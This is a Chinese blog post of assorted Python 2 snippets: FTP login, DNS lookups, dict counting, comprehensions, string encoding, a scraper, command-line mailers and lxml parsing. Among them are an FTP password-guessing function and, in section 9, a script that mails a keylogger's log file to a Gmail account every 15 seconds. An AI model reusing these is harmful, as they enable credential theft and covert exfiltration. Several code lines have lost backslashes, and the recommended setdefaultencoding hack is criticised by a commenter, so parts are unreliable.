一些Python片段_6


1.Python的ftplib模块

先看实例:

def ftp_anon(host):
    try:
        print 'n[+] 测试匿名登陆……n'
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login()
        ftp.retrlines('LIST')
        ftp.quit()
        print 'n[+] 匿名登陆成功……'
    except ftplib.all_errors:
        print 'n[-] 匿名登陆失败……'

def ftp_crack(host, user, pwd):
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 10)
        ftp.login(user, pwd)
        ftp.retrlines('LIST')
        ftp.quit()
        print 'n[+] 登陆成功,用户名:' + user + ' 密码:' + pwd
    except ftplib.all_errors:
        pass

ftp = ftplib.FTP()  #返回FTP类的一个实例

ftp.connect(host, 21, 10)  #连接host的21端口,取timeout为10

ftp.retrlines(‘LIST’)  #以ASCII模式返回目录/文件列表

官方文档:20.8. ftplib — FTP protocol client — Python 2.7.8 documentation

2.Python的socket模块的简单介绍

一、通过gethostbyname获取域名对应的IP(s)

host = socket.gethostbyname('ixyzero.com')
In [10]: socket.gethostbyname?
Type:        builtin_function_or_method
String form: <built-in function gethostbyname>
Docstring:
gethostbyname(host) -> address

Return the IP address (a string of the form '255.255.255.255') for a host.

In [11]: socket.gethostbyname_ex?
Type:        builtin_function_or_method
String form: <built-in function gethostbyname_ex>
Docstring:
gethostbyname_ex(host) -> (name, aliaslist, addresslist)

Return the true host name, a list of aliases, and a list of IP addresses,
for a host.  The host argument is a string giving a host name or IP number.

In [12]: baidu = socket.gethostbyname('www.baidu.com')

In [13]: type(baidu)
Out[13]: str

In [14]: print baidu
220.181.112.244

In [15]: baidu2 = socket.gethostbyname_ex('www.baidu.com')

In [16]: type(baidu2)
Out[16]: tuple


In [17]: print baidu2
('www.a.shifen.com', ['www.baidu.com'], ['220.181.112.244', '220.181.111.188'])

In [18]: for item in baidu2[2]: print item
220.181.112.244
220.181.111.188
import socket
result = socket.getaddrinfo('www.baidu.com', None, 0, socket.SOCK_STREAM)
counter = 1
for item in result:
    print "%-2d: %s" % (counter, item[4])
    counter += 1

 

3.Python的字典去重/计数&排序
def get_counts(sequence):
    counts = {}
    for x in sequence:
        if x in counts:
            counts[x] += 1
        else:
            counts[x] = 1
    return counts
####
from collections import defaultdict
def get_counts2(sequence):
    counts = defaultdict(int)
    for x in sequence:
        counts[x] += 1
    return counts
####
dict_str = {'blue':'[email protected]', 'allen':'[email protected]', 'sophia':'[email protected]', 'ceen':'[email protected]'}
print dict_str
# 按照key进行排序
print sorted(dict_str.items(), key=lambda d:d[0])
# 按照value进行排序
print sorted(dict_str.items(), key=lambda d:d[1])

for key, value in dict_str.items():
	print key, value

 

4.Python中函数亦为对象
####函数亦为对象####
states = ['  Alabama ', 'Georgia!', 'Georgia', 'georgia', 'south    carolina##', ' West virginia?', 'New York .', 'China.', 'Beijing...']

import re
def clean_stings(strings):
    result = []
    for value in strings:
        value = value.strip()
        value = re.sub('[!#?]', '', value)
        value = value.title()
        result.append(value)
    return result
clean_stings(states)

def remove_punctuation(value):
    return re.sub('[!?#]', '', value)
clean_ops = [str.strip, remove_punctuation, str.title]
def clean_stings2(strings, ops):
    result = []
    for value in strings:
        for function in ops:
            value = function(value)
        result.append(value)
    return result
clean_stings2(states, clean_ops)

map(remove_punctuation, states) #内置的map函数有点牛逼啊!

 

5.Python中的推导式{超赞!}
#列表推导式
strings = ['a', 'as', 'a', 'bad', 'boy', 'Python']
[x.upper() for x in strings]
[x.upper() for x in strings if len(x)>2]

#字典推导式
dict_map = {key:value for key, value in enumerate(strings)}
dict_map = dict((value, key) for key, value in enumerate(strings))
def file_2_dict(fileName):
    return {k.strip():v.strip() for k, v in (l.split('=') for l in open(fileName))}

#集合推导式
set_map = {key for key in strings}

#嵌套列表推导式
all_data = [['Tom', 'Jerry', 'Lily', 'Lucy', 'Hello,world', 'Jefferson', 'Steven', 'Joe', 'Bill'], ['Susie', 'Cookie', 'Qunar', 'Baidu', 'Notepad', 'Apple', 'Alibaba']]
names_of_interset = []
for names in all_data:
    enough = [name for name in names if name.count('e')>2]
    names_of_interset.extend(enough)

names2 = [name for names in all_data for name in names if name.count('e') > 2]
names3 = [name for names in all_data for name in names]

 

6.Python的encode和decode方法

先来一个Windows下的封装函数,避免出现乱码:

import sys
def encode(s):
    return s.decode('utf-8').encode(sys.stdout.encoding, 'ignore')

该函数的功能,就是先将给定的字符串s进行utf8解码,然后再使用系统终端默认字符编码方式对字符串进行编码,对于Windows下的终端显示效果很好;

Python内建的encode()方法以 encoding 指定的编码格式编码字符串。errors参数可以指定不同的错误处理方案。
语法:str.encode(encoding=’UTF-8′,errors=’strict’)
encoding — 要使用的编码,如”UTF-8″。
errors — 设置不同错误的处理方案。默认为 ‘strict’,意为编码错误引起一个UnicodeError。 其他可能得值有 ‘ignore’, ‘replace’, ‘xmlcharrefreplace’, ‘backslashreplace’ 以及通过 codecs.register_error() 注册的任何值。

一般在和字符编码相关的Python脚本中,经常需要在开头添加:

import sys
reload(sys)
sys.setdefaultencoding('utf8')

因为在Python2.5及以后的版本中,初始化之后会删除 sys.setdefaultencoding 这个方法,我们需要重新载入reload(sys),然后手动指定默认编码方式。

In [26]: import sys

In [27]: print sys.stdout.encoding
cp936

In [28]: a = 'string...'

In [29]: a.encode?
Type:        builtin_function_or_method
String form: <built-in method encode of str object at 0x033E41C0>
Docstring:
S.encode([encoding[,errors]]) -> object

Encodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeEncodeError. Other possible values are 'ignore', 'replace' and
'xmlcharrefreplace' as well as any other name registered with
codecs.register_error that is able to handle UnicodeEncodeErrors.
encoding默认将s编码为系统默认编码格式,默认的strict可能会导致UnicodeEncodeError错误

In [30]: s = '中国'

In [31]: print s
涓浗

In [32]: type(s)
Out[32]: str

In [33]: repr(s)
Out[33]: "'\xe4\xb8\xad\xe5\x9b\xbd'"

In [34]: s.en
s.encode   s.endswith

In [34]: s.encode('gb2312')
---------------------------------------------------------------------------
UnicodeDecodeError                        Traceback (most recent call last)
<ipython-input-34-d73c576b1830> in <module>()
----> 1 s.encode('gb2312')

UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 0: ordinal not in range(128)
'''
这里抛出异常的原因在于:Python 会自动的先将 s 解码为 unicode ,然后再编码成 gb2312。因为解码是python自动进行的,我们没有指明解码方式,python 就会使用 sys.defaultencoding 指明的方式来解码。很多情况下 sys.defaultencoding 是 ASCII,如果 s 不是这个类型就会出错。
'''

In [35]: s.decode('utf-8').encode('gb2312')
Out[35]: 'xd6xd0xb9xfa'

In [36]: sys.stdout.encoding
Out[36]: 'cp936'

In [37]: s.decode('utf-8')
Out[37]: u'u4e2du56fd'

In [38]: s.decode('utf-8').encode('utf-8')
Out[38]: 'xe4xb8xadxe5x9bxbd'

In [39]: s.decode?
Type:        builtin_function_or_method
String form: <built-in method decode of str object at 0x034F39C0>
Docstring:
S.decode([encoding[,errors]]) -> object

Decodes S using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a UnicodeDecodeError. Other possible values are 'ignore' and 'replace'
as well as any other name registered with codecs.register_error that is
able to handle UnicodeDecodeErrors.
当我们没有指明解码方式时,Python 就会使用 sys.defaultencoding 指明的方式来解码。很多情况下 sys.defaultencoding 是 ASCII,如果 s 不是这个类型就会出错。
参考链接:
7.Python的字符串split函数改进版
def tsplit(string, delimiters):
    """Behaves str.split but supports multiple delimiters."""
    delimiters = tuple(delimiters)
    stack = [string,]
    for delimiter in delimiters:
        for i, substring in enumerate(stack):
            substack = substring.split(delimiter)
            stack.pop(i)
            for j, _substring in enumerate(substack):
                stack.insert(i+j, _substring)

    return stack
####
s = 'thing1,thing2/thing3-thing4'
print tsplit(s, (',', '/', '-'))	# ['thing1', 'thing2', 'thing3', 'thing4']
print tsplit('你好,Python,yoyo-checknow. Justdoit!', (',', ',', '.'))	# ['xe4xbdxa0xe5xa5xbd', 'Python', 'yoyo-checknow', ' Justdoit!']
8.Python下载OSChina的代码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re, urllib, sys, time

def main():
    #伪装浏览器
    headers = ('User-Agent','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)')
    opener = urllib.URLopener()
    opener.addheaders = [headers]
    #循环列表页
    for page in range(1,29):
        url = "http://www.oschina.net/code/list/7/python?show=time&p=" + str(page)
        data = opener.open(url).read()
        data = data.decode('UTF8')
        #取出文章的url地址
        url_list = re.findall(re.compile(r'<a href="(.*)" target="_blank" title='), data)
        #取出文章名称
        post_list = re.findall(re.compile(r'"_blank" title="(.*)">'), data)
        for i in range(len(url_list)):
            reload(sys)
            sys.setdefaultencoding('utf-8')
            post_data = opener.open(url_list[i]).read()
            post_data = post_data.decode('UTF8')
            #由于刚入门,对re不是特别了解,请教了大拿后给的一个简单的方案,替换换行为AaA,然后取出文章
            x = post_data.replace('n', 'AaA')
            post = re.match(r".*<pre class="brush: python; auto-links: false; ">(.*)</pre", x)
            print(post_list[i])
            #一开始使用的时候发现报错,因为有的文章页面没有任何代码,所以加了try。
            try:
                #根据文章名称命名文件
                post_name = re.sub('[/:.* ]', '_', post_list[i])
                f = open(r'oschina/%s.py' % post_name, 'w')
                post = post.group(1).replace('AaA', 'n')
                f.write(post)
                f.close()
            except AttributeError:
                print(post_list[i] + ":null")
            time.sleep(1)
    print('That' all!')
if __name__ == '__main__':
    main()

原文链接python 下载oschina python代码

9.用Python发邮件
#!/usr/bin/env python
#-*- coding: utf8 -*-
'''
用于发送邮件(可以发送附件)的命令行程序
'''
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import sys

def helpinfo():
    print '''
    Useage: pymail -u user@domain -p passwd -h smtp server host -t to who [-a attachment file path] [-n attachment name]
    Useage: email content use . to end
    -h  specify smtp server host
    -u  which user you login the smtp server,and must with it domain
    -p  the password of the smtp user
    -t  The email recipient,multiple addresses can use ',' split
    -a  Add attachment
    -n  Secify attachment name in the email
    '''

options = ['-t', '-a', '-n', '-h', '-u', '-p', '-s']    # 所有选项
argvnum = len(sys.argv) # 获取选项长度
# 检测命令行参数
for i in range(argvnum):
    if ( i % 2 != 0):
        if (sys.argv[i] not in options):
            print 'Unknow option ', sys.argv[i] , ', Please use -h see help!'
            sys.exit(3)
# 如果是-h或者没有命令行参数则显示帮助
try:
    if sys.argv[1] == '-h' or len(sys.argv) == 0:
        helpinfo()
except:
    helpinfo()
# 检测-n参数
if ('-n' in sys.argv) and ('-a' not in sys.argv):
    print 'Error:option "-n" must use after -a'
    sys.exit(2)
# 下面则是获取各个参数内容
try:
    tmpmailto = sys.argv[sys.argv.index('-t')  + 1]
    if ',' in tmpmailto:
        mailto = tmpmailto.split(',')
    else:
        mailto = [tmpmailto,]
except ValueError:
    print 'Error: need Mail Recipient'
    sys.exit(1)
haveattr=True
try:
    attrpath = sys.argv[sys.argv.index('-a') + 1]
    try:
        attrname = sys.argv[sys.argv.index('-n') +1 ]
    except ValueError:
        attrname = attrpath.split('/')[-1]
except:
    attrname = None
    haveattr = False
    attrpath = None
try:
    mail_host = sys.argv[sys.argv.index('-h') +1]
except ValueError:
    print 'Waring: No specify smtp server use 127.0.0.1'
    mail_host = '127.0.0.1'
try:
    mail_useremail = sys.argv[sys.argv.index('-u') +1]
except ValueError:
    print 'Waring: No specify user, use root'
    mail_useremail = 'root@localhost'
try:
    mail_sub = sys.argv[sys.argv.index('-s') + 1]
except:
    mail_sub = 'No Subject'
mail_user = mail_useremail.split('@')[0]
mail_postfix = mail_useremail.split('@')[1]
try:
    mail_pass = sys.argv[sys.argv.index('-p') +1]
except ValueError:
    mail_pass = ''
# 定义邮件发送函数
def send_mail(to_list, sub, content, haveattr, attrpath, attrname):
    me = mail_user + "<" + mail_user+"@"+mail_postfix +">"
    # 判断是否有附件
    if (haveattr):
        if (not attrpath):
            print 'Error : no input file of attachments'
            return False
        # 有附件则创建一个带附件的实例
        msg = MIMEMultipart()
        # 构造附件
        att = MIMEText(open(attrpath, 'rb').read(),'base64', 'utf8')
        att["Content-Type"] = 'application/octest-stream'
        att["Content-Disposition"] = 'attachment;filename="'+ attrname +'"'
        msg.attach(att)
        msg.attach(MIMEText(content))
    else:
        # 无责创建一个文本的实例
        msg = MIMEText(content)
    # 邮件头
    msg['Subject'] = sub
    msg['From'] = me
    msg['To'] = ";".join(to_list)
    try:
        # 发送邮件
        s = smtplib.SMTP()
        s.connect(mail_host)
        if (mail_host != '127.0.0.1'):
            s.login(mail_user, mail_pass)
        s.sendmail(me, to_list, msg.as_string())
        s.close()
        return True
    except Exception, e:
        print str(e)
        return False

if __name__ == '__main__':
    try:
        content = ''
        while True:
            c = raw_input('')
            if c == '.':
                break
            content += c + 'n'
    except EOFError:
        for line in sys.stdin:
            content += line
    if send_mail(mailto, mail_sub, content, haveattr, attrpath, attrname):
        print "Success"
    else:
        print "Failed"
#!/usr/bin/env python
#coding=utf-8

import smtplib
from email.Message import Message
import time
import optparse
import sched

schedular=sched.scheduler(time.time, time.sleep)

def sendMail(emailTo, thePasswd):
    systemTime=time.strftime('%Y-%m-%d-%T',time.localtime(time.time()))
    try:
        fileObj=open("/root/.secret-keys.log", "r")    #"/root/.secret-keys.log"是键盘记录的输出文件,根据输出文件的不同适当的修改
        content=fileObj.read()
    except:
        print "Cannot read filen"
        exit()

    message = Message()
    message['Subject'] = 'Log Keys'    #邮件标题
    message['From'] = "[email protected]"
    message['To'] = emailTo
    message.set_payload("当前时间"+systemTime+"n"+content)    #邮件正文
    msg = message.as_string()

    smtp = smtplib.SMTP("smtp.gmail.com", port=587, timeout=20)
    #sm.set_debuglevel(1)		#开启debug模式
    smtp.starttls()				#使用安全连接
    smtp.login(emailTo, thePasswd)
    smtp.sendmail("[email protected]", emailTo, msg)
    time.sleep(5)	#避免邮件没有发送完成就调用了quit()
    smtp.quit()

def perform(inc, emailTo, thePasswd):
    schedular.enter(inc, 0, perform, (inc, emailTo, thePasswd))
    sendMail(emailTo, thePasswd)

def myMain(inc, emailTo, thePasswd):
    schedular.enter(0, 0, perform, (inc, emailTo, thePasswd))
    schedular.run()

if __name__=="__main__":
    optObj=optparse.OptionParser()
    optObj.add_option("-u", dest="user", help="Gmail account")
    optObj.add_option("-p", dest="passwd", help="Gmail Passwd")
    (options, args)=optObj.parse_args()

    emailName=options.user
    emailPasswd=options.passwd
    myMain(15, emailName, emailPasswd)	#15表示的是相隔时间,可以根据自己的需求设定
参考链接:
10.文件合并
#!/usr/bin/env python
# coding=utf-8
import sys, os, msvcrt

def join(in_filenames, out_filename):
    out_file = open(out_filename, 'w+')
    err_files = []
    for file in in_filenames:
        try:
            in_file = open(file, 'r')
            out_file.write(in_file.read())
            out_file.write('nn')
            in_file.close()
        except IOError:
            print 'error joining: ', file
            err_files.append(file)
    out_file.close()
    print 'join completed. %d file(s) missed.' % len(err_files)
    print 'output file: ', out_filename
    if len(err_files) > 0:
        print 'missed files:'
        print '--------------------------------'
        for file in err_files:
            print file
        print '--------------------------------'

if __name__ == '__main__':
    print 'scanning...'
    in_filenames = []
    for file in os.listdir(sys.argv[1]):
        if file.lower().endswith('[all].txt'):
            os.remove(file)
        elif file.lower().endswith('.txt'):
            in_filenames.append(file)
    if len(in_filenames) > 0:
        print '----------------------------------------'
        print '%d part(s) in total.' % len(in_filenames)
        print '----------------------------------------'
        book_name = raw_input('Enter the book name: ')
        print 'joining...'
        join(in_filenames, book_name + '[ALL].txt')
    else:
        print 'nothing found.'
    msvcrt.getch()
11.Python获取自身文件名的方法

有两种方法:__file__和sys.argv[0]

# coding=utf-8
import sys
print __file__
print sys.argv[0]
text = open(__file__).read()
print text[:-1]
12.lxml模块的几个用法
from lxml.html import parse
from urllib2 import urlopen
parsed = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parsed.getroot()

links = doc.findall('.//a')
links[15:20]
lnk = links[2]
lnk.get('href')
lnk.text_content()

urls = [lnk.get('href') for lnk in doc.findall('.//a')]
tables = doc.findall('.//table')
rows = doc.findall('.//tr')
####

zparsed = parse(urlopen('http://ixyzero.com/blog/sitemap.html'))
zdoc = zparsed.getroot()
zurls = [lnk.get('href') for lnk in zdoc.findall('.//a')]
zlinks = zdoc.findall('.//a')
####

parseD = parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))
doc = parseD.getroot()
def _unpack(doc, kind='a'):
	elts = doc.findall('.//%s' % kind)
	return [val.get('href') for val in elts]
13.友链统计相关
#!/usr/bin/env python
# coding=utf-8
def affect(points, keep_ratio, ratio, power):
    keep = points * keep_ratio
    if ratio >= 1.: return points
    return keep + (points - keep) * pow(ratio, power)

def calc_link_points(host, ul):
    # simplified host 不要子域名部分!
    parts = host.split('.')
    if parts[-2] in ('com','edu','net','gov','org'):
        host = '.'.join(host.split('.')[-3:])
    else:
        host = '.'.join(host.split('.')[-2:])

    link_density = linktext_count = totaltext_count = 0.001
    container_count = innerlink_count = 0.001
    for a in ul.findAll('a'):
        href = a.get('href', '')
        # 内部链接
        if not href or not href.lower().startswith('http') or host in href:
            innerlink_count += 1
            continue
        # 层次太深
        if urlparse(href)[2].strip('/').count('/') >= 1 or '?' in href:
            continue
        link_density += 1
        linktext_count += len(a.text)
        if '_blank' == a.get('target'):
            link_density += 1
    # 统计容器字数
    for t in ul.recursiveChildGenerator():
        if type(t) is NavigableString:
            totaltext_count += len(t)
        else:
            container_count += 1
    points = (link_density - innerlink_count) * 1000
    if points < 0: return 0

    points = affect(points, 0.1, linktext_count / totaltext_count, 2.)
    points = affect(points, 0.1, link_density / container_count, 1.)

    if points < 1000: points = 0
    return points
####
def find_text(body):
    candidates = []
    total_links = len(body.findAll('a')) + 0.001
    # 枚举文字容器
    for tag in ('div', 'section', 'article', 'td', 'li', 'dd', 'dt'):
        for x in body.findAll(tag):
            if type(x) is not Tag: continue
            points = len(x.text[:100].encode('utf8')) * 1000
            points = affect(points, 0.1, 1 - len(x.findAll('a')) * 1. / total_links, 1.)
            candidates.append((points, x))
    # 排序,取分数最高的容器
    candidates.sort(reverse = True)
    if candidates:
        return candidates[0][1]
    return body

代码片段取自:通过友情链接进行博客Feed的搜集,你的博客收录了吗,我目前还在理解、学习的阶段。

14.利用GoogleAPI进行少量统计结果抓取
#!/usr/bin/env python

import urllib
import simplejson
query = urllib.urlencode({'q':'ixyzero.com'})
url = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&%s'%(query)
search_results = urllib.urlopen(url)
json = simplejson.loads(search_results.read())
print(json)
results = json['responseData']['results']
print len(results)
for i in results:
    print i['title'] + ": " + i['url']

 

待续……
,

《 “一些Python片段_6” 》 有 2 条评论

  1. 立即停止使用 setdefaultencoding(‘utf-8’), 以及为什么
    https://blog.ernest.me/post/python-setdefaultencoding-unicode-bytes
    `
    最坏实践

    sys.setdefaultencoding(‘utf-8’) 会导致的两个大问题
    简单来说这么做将会使得一些代码行为变得怪异,而这怪异还不好修复,以一个不可见的 bug 存在着。下面我们举两个例子。
    1. 编码错误
    2. dictionray 行为异常

    问题的根源:Python2 中的 string
    Python 为了让其语法看上去简洁好用,做了很多 tricky 的事情,混淆 byte string 和 text string 就是其中一例。
    在 Python 里,有三大类 string 类型,unicode(text string),str(byte string,二进制数据),basestring,是前两者的父类。

    最佳实践
    · 所有 text string 都应该是 unicode 类型,而不是 str,如果你在操作 text,而类型却是 str,那就是在制造 bug。
    · 在需要转换的时候,显式转换。从字节解码成文本,用 var.decode(encoding),从文本编码成字节,用 var.encode(encoding)。
    · 从外部读取数据时,默认它是字节,然后 decode 成需要的文本;同样的,当需要向外部发送文本时,encode 成字节再发送。
    `

    Why should we NOT use sys.setdefaultencoding(“utf-8”) in a py script?
    https://stackoverflow.com/questions/3828723/why-should-we-not-use-sys-setdefaultencodingutf-8-in-a-py-script

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注